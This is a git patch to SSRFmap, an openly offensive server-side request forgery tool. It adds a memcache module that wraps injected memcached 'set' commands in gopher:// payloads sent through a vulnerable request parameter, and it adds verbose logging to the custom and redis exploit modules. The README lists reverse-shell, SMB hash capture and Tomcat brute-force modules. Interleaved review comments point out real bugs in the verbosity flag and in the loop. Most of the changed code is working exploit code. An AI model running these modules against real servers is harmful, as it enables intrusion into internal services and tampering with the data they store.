From da86cab4426bcee74118a2b446b83a57791899bb Mon Sep 17 00:00:00 2001
From: Swissky
Date: Mon, 8 Jul 2019 23:46:48 +0200
Subject: [PATCH] MODULE - Memcache store data
---
 README.md | 38 ++++++++++++++++++++------------------
 modules/custom.py | 19 +++++++++++++------
 modules/memcache.py | 34 ++++++++++++++++++++++++++++++++++
 modules/redis.py | 6 ++++++
 ssrfmap.py | 1 +
 5 files changed, 74 insertions(+), 24 deletions(-)
 create mode 100644 modules/memcache.py
diff --git a/README.md b/README.md
index a20e44c..8ef69ae 100644
--- a/README.md
+++ b/README.md
@@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
 | `smbhash` | Force an SMB authentication via a UNC Path |
 | `tomcat` | Bruteforce attack against Tomcat Manager |
 | `custom` | Send custom data to a listening service, e.g: netcat |
+| `memcache` | Store data inside the memcache instance |
 ## Install and Manual
@@ -46,26 +47,27 @@ The following modules are already implemented and can be used with the `-m` argu
 Basic install from the Github repository.
 ```powershell
-git clone https://github.com/swisskyrepo/SSRFmap
-cd SSRFmap/
-pip3 install -r requirements.txt
-python3 ssrfmap.py
+$ git clone https://github.com/swisskyrepo/SSRFmap
+$ cd SSRFmap/
+$ pip3 install -r requirements.txt
+$ python3 ssrfmap.py
-usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
- [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
- [--ssl [SSL]] [--level [LEVEL]]
+ usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
+ [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
+ [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
-optional arguments:
- -h, --help show this help message and exit
- -r REQFILE SSRF Request file
- -p PARAM SSRF Parameter to target
- -m MODULES SSRF Modules to enable
- -l HANDLER Start an handler for a reverse shell
- --lhost LHOST LHOST reverse shell
- --lport LPORT LPORT reverse shell
- --uagent USERAGENT User Agent to use
- --ssl [SSL] Use HTTPS without verification
- --level [LEVEL] Level of test to perform (1-5, default: 1)
+ optional arguments:
+ -h, --help show this help message and exit
+ -r REQFILE SSRF Request file
+ -p PARAM SSRF Parameter to target
+ -m MODULES SSRF Modules to enable
+ -l HANDLER Start an handler for a reverse shell
+ -v [VERBOSE] Enable verbosity
+ --lhost LHOST LHOST reverse shell
+ --lport LPORT LPORT reverse shell
+ --uagent USERAGENT User Agent to use
+ --ssl [SSL] Use HTTPS without verification
+ --level [LEVEL] Level of test to perform (1-5, default: 1)
 ```
 ## Examples
diff --git a/modules/custom.py b/modules/custom.py
index 13e4aae..68ed1de 100644
--- a/modules/custom.py
+++ b/modules/custom.py
@@ -14,10 +14,17 @@ class exploit():
 def __init__(self, requester, args):
 logging.info("Module '{}' launched !".format(name))
- gen_host = gen_ip_list("127.0.0.1", args.level)
- SERVICE_PORT = input("Service Port: ")
- SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
+ gen_hosts = gen_ip_list("127.0.0.1", args.level)
+ self.SERVICE_PORT = input("Service Port: ")
+ self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
- for SERVICE_IP in gen_host:
- payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT)
- r = requester.do_request(args.param, payload)
\ No newline at end of file
+ for gen_host in gen_hosts:
+ payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
+
+ if args.verbose == True:
+ logging.info("Generated payload : {}".format(payload))
+
+ r = requester.do_request(args.param, payload)
+
+ if args.verbose == True:
+ logging.info("Module '{}' ended !".format(name))
\ No newline at end of file
diff --git a/modules/memcache.py b/modules/memcache.py
new file mode 100644
index 0000000..cb2b133
--- /dev/null
+++ b/modules/memcache.py
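Review bot: The new `if args.verbose == True:` checks in `__init__` of modules/custom.py match only a bare `-v`: ssrfmap.py in this commit declares the option with `action ='store'`, `nargs='?'` and `const=True`, so `-v 1` stores the string `'1'` and both log calls are skipped silently. Testing truthiness, `if args.verbose:`, and declaring the flag as `parser.add_argument('-v', action='store_true', dest='verbose', help="Enable verbosity")` removes the mismatch; the same comparison is in the memcache.py and redis.py hunks. The verbose line also writes the whole generated request, including what was typed at the `Service Data:` prompt, to the log, which deserves a comment where those logs are retained.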
@@ -0,0 +1,34 @@ +from core.utils import * +import urllib.parse +import logging + +name = "memcache" +description = "Store data inside the memcache instance" +author = "Swissky" +documentation = [] + +class exploit(): + SERVICE_IP = "127.0.0.1" + SERVICE_PORT = "11211" + SERVICE_DATA = "\r\n" + + def __init__(self, requester, args): + logging.info("Module '{}' launched !".format(name)) + gen_host = gen_ip_list("127.0.0.1", args.level) + payload = input("Data to store: ") + + self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload)) + self.SERVICE_DATA += '{}\r\n'.format(payload) + self.SERVICE_DATA += 'quit\r\n' + self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA) + + for SERVICE_IP in gen_host: + payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT) + + if args.verbose == True: + logging.info("Generated payload : {}".format(payload)) + + r = requester.do_request(args.param, payload) + + if args.verbose == True: + logging.info("Module '{}' ended !".format(name)) \ No newline at end of file diff --git a/modules/redis.py b/modules/redis.py index 7879429..098e378 100644 --- a/modules/redis.py +++ b/modules/redis.py @@ -45,9 +45,15 @@ class exploit(): payload = payload.replace("SERVER_CRON", self.SERVER_CRON) payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD)) + if args.verbose == True: + logging.info("Generated payload : {}".format(payload)) + # Send the payload r = requester.do_request(args.param, payload) + if args.verbose == True: + logging.info("Module '{}' ended !".format(name)) + """ TODO: This exploit only works if you have control over a cron file. diff --git a/ssrfmap.py b/ssrfmap.py index 9d4daf4..4908dc7 100644 --- a/ssrfmap.py +++ b/ssrfmap.py 
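Review bot: In modules/memcache.py the loop `for SERVICE_IP in gen_host:` never uses its loop variable: the call passes `self.SERVICE_IP`, the class constant `"127.0.0.1"`, so every iteration builds and sends the identical request, whereas custom.py in this commit passes the loop variable. Either pass it, `payload = wrapper_gopher(self.SERVICE_DATA, SERVICE_IP, self.SERVICE_PORT)`, or drop the loop and the `gen_ip_list` call. Separately, the `set` header uses `len(payload)`, a character count, while the memcached text protocol expects the byte length of the data block, so non-ASCII input would produce a mismatched length; `len(payload.encode())` avoids that. Reusing the name `payload` for both the typed input and the generated URL makes the first problem harder to see.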
@@ -29,6 +29,7 @@ def parse_args():
 parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
 parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
 parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
+ parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
 parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
 parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
 parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")